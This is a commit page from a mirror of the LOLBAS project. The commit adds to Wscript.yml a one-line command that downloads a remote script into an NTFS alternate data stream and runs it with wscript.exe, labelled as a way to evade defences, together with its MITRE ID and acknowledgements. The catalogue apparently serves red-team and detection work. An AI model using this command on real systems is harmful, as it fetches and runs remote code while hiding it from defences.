public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 14:59:03 +01:00
Code Issues Projects Releases Wiki Activity

Added example to wscript

Browse Source
This commit is contained in:
Oddvar Moe 2019-06-27 17:27:31 +02:00
parent 087b6367ca
commit b284e46763
1 changed files with 10 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
yml/OSBinaries/Wscript.yml
View File

@ -12,6 +12,14 @@ Commands:
MitreID: T1096 MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
Description: Download and execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\System32\wscript.exe
- Path: C:\Windows\SysWOW64\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe
@ -24,4 +32,6 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: SaiLay(valen)
Handle: '@404death'
--- ---